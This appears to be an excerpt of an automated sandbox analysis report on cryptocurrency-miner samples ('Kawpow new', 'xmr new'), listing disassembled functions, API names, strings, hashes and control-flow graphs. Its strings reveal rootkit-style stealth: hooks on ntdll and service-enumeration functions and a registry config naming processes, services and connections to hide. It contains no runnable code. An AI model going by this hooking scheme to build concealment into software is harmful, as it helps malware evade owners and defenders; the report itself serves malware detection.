                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 85be8d71e6d2514d3f56010550cfea0398cf361631401c43bdaedd0a9950a0ca
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: D651B2731083988EEF748F21948835A77A9F358B84F1E4155EAAD47BE5CBB8D850C732
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction ID: 5877f3e63d16b976b45ef95200a4147caf0081c84c84ecddf9a0809085c2c30a
                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                          • Instruction Fuzzy Hash: 9F51EE32108382CFEF648B11D56835A77A8F358B96F1A8156DB8D83BE6CB38D851C712
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 4f11b148c0c42fce731922f0d68e1fe2f5b56187b8c443f5290107562df1d33d
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: C15191327097028FEF14CB15E458B1A379EF358B99F6281A4DA0E437A8EB34CD418736
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: a72cf43a30f49d6095cee7d994a7b6c78d4a69675b173fba3c57c6c244533bf7
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: 9931AD322097418BEB14DF11E86C71A37ADF348B89F168194EE5E03BA8DB38CD41C726
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction ID: f9ad87cd0163af3215299d396aca5d665c15b7b174453e07fdbb6e30be1fb1ab
                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction Fuzzy Hash: C1D14632728A8089EB11CF75D4443ED37B9F348B98F194256CE5EA7BA9DA34C846C371
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ConsoleErrorLastMode
                          • String ID:
                          • API String ID: 953036326-0
                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction ID: f8c3b906ba4ea1a476e87ab9cfaf369647cfe41322a82df934faf8283cfcb51b
                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction Fuzzy Hash: 5991B63272869085FF60DF7594483AE2BA8B74DB89F19414ADE0E776A5DB34CC42C732
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction ID: 84d24e45938111ea6151c3b5d5a10f5e9e636bbe1acd3e2595c1c74b5e3f52fa
                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction Fuzzy Hash: 4971E436208B8949EF34DE2599483AB67E8F38DB84F4A0057DD2D53BA9DA34CE41C731
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: 54c1463dec9ecac5e389b84d9d4c6094614e7dcc82620cb40853520d1f6a4d02
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 5861CD33608B858EEB20CF65D05439E77A8F348B89F158255EF4D17BA8DB38D894C721
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction ID: 899993287a524ea751eecffad9dff68201a8343ffa9837ce628f9db6e3d222fc
                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction Fuzzy Hash: F551283220C78989EE74CA29A06C3AB67D9F38D744F4E0166DD6D13B69DA39CD04C772
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction ID: fecd31e7717012afdb553d6c92a1f250921db66021e19d878a9bfeddfde18a57
                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction Fuzzy Hash: 5841E832329A8086DF60CF25E44839B77A4F38C794F554122EE4D977A4EB3CC801C761
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction ID: cf110e6f90d2eb9ffaa5358b20cb6676eeee8804735a79ae29b1245cd7ed8ebe
                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction Fuzzy Hash: 84111932218B8482EF618F29E44825A77E9F788B94F5D4260EA9C07768DF38C951CB21
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
                          • API String ID: 592178966-758928094
                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction ID: 347dae61d650896506311116a2c6a29cc5d893e491be5346607617923156cd40
                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                          • Instruction Fuzzy Hash: 7BE08661644B4991DF018F21E85429933A4DB5CB64B49D162995C06331FA38D6E9C311
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: Locator'$riptor at (
                          • API String ID: 592178966-4215709766
                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction ID: ede72b90f6e278bb6fc0db8ed007ca2590a42f50c2f077050b399dbc3c5c0816
                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                          • Instruction Fuzzy Hash: 7FE08661604B4985DF018F21E4541997364EB5CB54B89D162C94C06331EA38D6E5C311
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID:
                          • API String ID: 756756679-0
                          • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction ID: bc306bcfdac00f1bbd008edcb8f6a429a2ea39b269d853a96f8084b2326c8889
                          • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                          • Instruction Fuzzy Hash: 8511BF25A15B4889EF44CB66A80822A73A8FB8DFC0F0E4064CE5E53776DF38C842D320
                          APIs
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$AllocProcess
                          • String ID:
                          • API String ID: 1617791916-0
                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction ID: 6b6507cf1087ef59c63614d79ddecb2b99b24c00feded8b5597b2131e7bbad0a
                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                          • Instruction Fuzzy Hash: C0E03935A2160486EB458B62D80836A36E5EB8DF06F0A802489190B362EF7D8899C771

                          Execution Graph

                          Execution Coverage:0.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 14774 12c42a83844 14775 12c42a83866 14774->14775 14776 12c42a83851 StrCmpNIW 14774->14776 14776->14775

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 12c42a83844-12c42a8384f 1 12c42a83869-12c42a83870 0->1 2 12c42a83851-12c42a83864 StrCmpNIW 0->2 2->1 3 12c42a83866 2->3 3->1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID:
                          • String ID: dialer
                          • API String ID: 0-3528709123
                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction ID: 7eb45649479b34a9df7f298d22e6ae11392ad7005ee9e82459a449d7f5cbe8d1
                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction Fuzzy Hash: E1D0A77039168586FF54FFA788EA6EA6352EB04B44F8C5122CF1041150EB188DAEE751

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: 64364bef4824b1453e48b5494702ed2600e375624101b07d3b4667038ba7c1fa
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: 1161F332B416D087EB54EF1590227AEB393F754BA8F588122DF5907788DE38DC62C781

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 52 7ff652d51140-7ff652d51151 call 7ff652d51160
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217462901.00007FF652D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF652D50000, based on PE: true
                          • Associated: 00000016.00000002.2217350729.00007FF652D50000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000016.00000002.2217609995.00007FF652D5C000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000016.00000002.2217781693.00007FF652D5F000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000016.00000002.2217867173.00007FF652D60000.00000008.00000001.01000000.0000000E.sdmp
                          • Associated: 00000016.00000002.2220313403.00007FF653254000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000016.00000002.2220423643.00007FF65328C000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_7ff652d50000_xmr new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction ID: cbe6f86d63ffad3c42d6a0bf972cd2c12e74e05e703c4db04e493fa3fbcdc03e
                          • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction Fuzzy Hash: 0CB01231F0530D84E3002F15DC413593260EF08749F540330C40C63352CEFD90408B30

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 301 12c42a82b2c-12c42a82ba5 call 12c42aa2ce0 304 12c42a82bab-12c42a82bb1 301->304 305 12c42a82ee0-12c42a82f03 301->305 304->305 306 12c42a82bb7-12c42a82bba 304->306 306->305 307 12c42a82bc0-12c42a82bc3 306->307 307->305 308 12c42a82bc9-12c42a82bd9 GetModuleHandleA 307->308 309 12c42a82bdb-12c42a82beb GetProcAddress 308->309 310 12c42a82bed 308->310 311 12c42a82bf0-12c42a82c0e 309->311 310->311 311->305 313 12c42a82c14-12c42a82c33 StrCmpNIW 311->313 313->305 314 12c42a82c39-12c42a82c3d 313->314 314->305 315 12c42a82c43-12c42a82c4d 314->315 315->305 316 12c42a82c53-12c42a82c5a 315->316 316->305 317 12c42a82c60-12c42a82c73 316->317 318 12c42a82c75-12c42a82c81 317->318 319 12c42a82c83 317->319 320 12c42a82c86-12c42a82c8a 318->320 319->320 321 12c42a82c9a 320->321 322 12c42a82c8c-12c42a82c98 320->322 323 12c42a82c9d-12c42a82ca7 321->323 322->323 324 12c42a82d9d-12c42a82da1 323->324 325 12c42a82cad-12c42a82cb0 323->325 326 12c42a82da7-12c42a82daa 324->326 327 12c42a82ed2-12c42a82eda 324->327 328 12c42a82cc2-12c42a82ccc 325->328 329 12c42a82cb2-12c42a82cbf call 12c42a8199c 325->329 330 12c42a82dbb-12c42a82dc5 326->330 331 12c42a82dac-12c42a82db8 call 12c42a8199c 326->331 327->305 327->317 333 12c42a82cce-12c42a82cdb 328->333 334 12c42a82d00-12c42a82d0a 328->334 329->328 338 12c42a82df5-12c42a82df8 330->338 339 12c42a82dc7-12c42a82dd4 330->339 331->330 333->334 341 12c42a82cdd-12c42a82cea 333->341 335 12c42a82d3a-12c42a82d3d 334->335 336 12c42a82d0c-12c42a82d19 334->336 343 12c42a82d4b-12c42a82d58 lstrlenW 335->343 344 12c42a82d3f-12c42a82d49 call 12c42a81bbc 335->344 336->335 342 12c42a82d1b-12c42a82d28 336->342 347 12c42a82e05-12c42a82e12 lstrlenW 338->347 348 12c42a82dfa-12c42a82e03 call 12c42a81bbc 338->348 339->338 346 12c42a82dd6-12c42a82de3 339->346 349 12c42a82ced-12c42a82cf3 341->349 352 12c42a82d2b-12c42a82d31 342->352 354 12c42a82d5a-12c42a82d64 343->354 355 12c42a82d7b-12c42a82d8d call 12c42a83844 343->355 344->343 359 12c42a82d93-12c42a82d98 344->359 356 12c42a82de6-12c42a82dec 346->356 350 12c42a82e14-12c42a82e1e 347->350 351 12c42a82e35-12c42a82e3f call 12c42a83844 347->351 348->347 366 12c42a82e4a-12c42a82e55 348->366 358 12c42a82cf9-12c42a82cfe 349->358 349->359 350->351 360 12c42a82e20-12c42a82e33 call 12c42a8152c 350->360 361 12c42a82e42-12c42a82e44 351->361 352->359 362 12c42a82d33-12c42a82d38 352->362 354->355 365 12c42a82d66-12c42a82d79 call 12c42a8152c 354->365 355->359 355->361 356->366 367 12c42a82dee-12c42a82df3 356->367 358->334 358->349 359->361 360->351 360->366 361->327 361->366 362->335 362->352 365->355 365->359 372 12c42a82e57-12c42a82e5b 366->372 373 12c42a82ecc-12c42a82ed0 366->373 367->338 367->356 377 12c42a82e5d-12c42a82e61 372->377 378 12c42a82e63-12c42a82e7d call 12c42a885c0 372->378 373->327 377->378 380 12c42a82e80-12c42a82e83 377->380 378->380 383 12c42a82e85-12c42a82ea3 call 12c42a885c0 380->383 384 12c42a82ea6-12c42a82ea9 380->384 383->384 384->373 386 12c42a82eab-12c42a82ec9 call 12c42a885c0 384->386 386->373
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction ID: 24d5473e73a1e6d201f3aef239ece9bdc289af09ab6fb3abb8e630c228cdd45f
                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction Fuzzy Hash: 63B17B76250AD086FB68AF25D8627EE67A6FB44B88F045017EF0953794EF34CC62C781
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction ID: f3d84bb24efc054f454bbf40d14d68741f61f3065c39adb9398ba2eb05f0d9fd
                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction Fuzzy Hash: FB318D76245BC08AFB60AF61E8A13EE7361F784744F44442ADB4D47B98EF38C559CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction ID: ffc510297ffbb1d459223f28bbc91d92f5c8cf18e734e85cd1303e97c41cd9c1
                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction Fuzzy Hash: 55316A36254BC086EB60AB25E8913DE73A1F788794F540526EF9D43B98EF38C166CB41

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 106492572-2879589442
                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction ID: 76189dad7000d06fbca8ec999f6a80c8827b98dcc41b9fc24fea0cd4149c444a
                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction Fuzzy Hash: E2712C36350A9085FB10BF22E8A66DE2376FB84B88F445522DF4E57B28EF34C465C781

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction ID: d57b426fe4380037e82cec8a3b038173de63fa4e4fbcc220b3c9836ddf264571
                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction Fuzzy Hash: 20514972640B8486FB50DF62E46939F67A2F788FC9F584526DF4A07728DF38C0698B41

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2217080494.0000012C42A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000012C42A80000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a80000_xmr new.jbxd
                          Similarity
                          • API ID: CurrentThread$AddressHandleModuleProc
                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                          • API String ID: 4175298099-1975688563
                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction ID: dd6edee3eee0cd0d2d4fe47d8dce7a9ecadb5d750b604badc92b1e9c6ab6633b
                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction Fuzzy Hash: 623177742809C6A0FA45FF66EC776EE6323FB44348F8058139F09535659E3886BAD3D2

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 147 12c42a36910-12c42a36916 148 12c42a36951-12c42a3695b 147->148 149 12c42a36918-12c42a3691b 147->149 150 12c42a36a78-12c42a36a8d 148->150 151 12c42a3691d-12c42a36920 149->151 152 12c42a36945-12c42a36984 call 12c42a36fc0 149->152 156 12c42a36a8f 150->156 157 12c42a36a9c-12c42a36ab6 call 12c42a36e54 150->157 154 12c42a36922-12c42a36925 151->154 155 12c42a36938 __scrt_dllmain_crt_thread_attach 151->155 167 12c42a36a52 152->167 168 12c42a3698a-12c42a3699f call 12c42a36e54 152->168 159 12c42a36931-12c42a36936 call 12c42a36f04 154->159 160 12c42a36927-12c42a36930 154->160 163 12c42a3693d-12c42a36944 155->163 161 12c42a36a91-12c42a36a9b 156->161 170 12c42a36aef-12c42a36b20 call 12c42a37190 157->170 171 12c42a36ab8-12c42a36aed call 12c42a36f7c call 12c42a36e1c call 12c42a37318 call 12c42a37130 call 12c42a37154 call 12c42a36fac 157->171 159->163 173 12c42a36a54-12c42a36a69 167->173 180 12c42a369a5-12c42a369b6 call 12c42a36ec4 168->180 181 12c42a36a6a-12c42a36a77 call 12c42a37190 168->181 182 12c42a36b22-12c42a36b28 170->182 183 12c42a36b31-12c42a36b37 170->183 171->161 200 12c42a36a07-12c42a36a11 call 12c42a37130 180->200 201 12c42a369b8-12c42a369dc call 12c42a372dc call 12c42a36e0c call 12c42a36e38 call 12c42a3ac0c 180->201 181->150 182->183 184 12c42a36b2a-12c42a36b2c 182->184 185 12c42a36b7e-12c42a36b94 call 12c42a3268c 183->185 186 12c42a36b39-12c42a36b43 183->186 190 12c42a36c1f-12c42a36c2c 184->190 208 12c42a36bcc-12c42a36bce 185->208 209 12c42a36b96-12c42a36b98 185->209 191 12c42a36b4f-12c42a36b5d call 12c42a45780 186->191 192 12c42a36b45-12c42a36b4d 186->192 197 12c42a36b63-12c42a36b78 call 12c42a36910 191->197 212 12c42a36c15-12c42a36c1d 191->212 192->197 197->185 197->212 200->167 221 12c42a36a13-12c42a36a1f call 12c42a37180 200->221 201->200 250 12c42a369de-12c42a369e5 __scrt_dllmain_after_initialize_c 201->250 210 12c42a36bd0-12c42a36bd3 208->210 211 12c42a36bd5-12c42a36bea call 12c42a36910 208->211 209->208 217 12c42a36b9a-12c42a36bbc call 12c42a3268c call 12c42a36a78 209->217 210->211 210->212 211->212 231 12c42a36bec-12c42a36bf6 211->231 212->190 217->208 242 12c42a36bbe-12c42a36bc6 call 12c42a45780 217->242 239 12c42a36a21-12c42a36a2b call 12c42a37098 221->239 240 12c42a36a45-12c42a36a50 221->240 236 12c42a36c01-12c42a36c11 call 12c42a45780 231->236 237 12c42a36bf8-12c42a36bff 231->237 236->212 237->212 239->240 249 12c42a36a2d-12c42a36a3b 239->249 240->173 242->208 249->240 250->200 251 12c42a369e7-12c42a36a04 call 12c42a3abc8 250->251 251->200
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.2216953707.0000012C42A30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000012C42A30000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_12c42a30000_xmr new.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
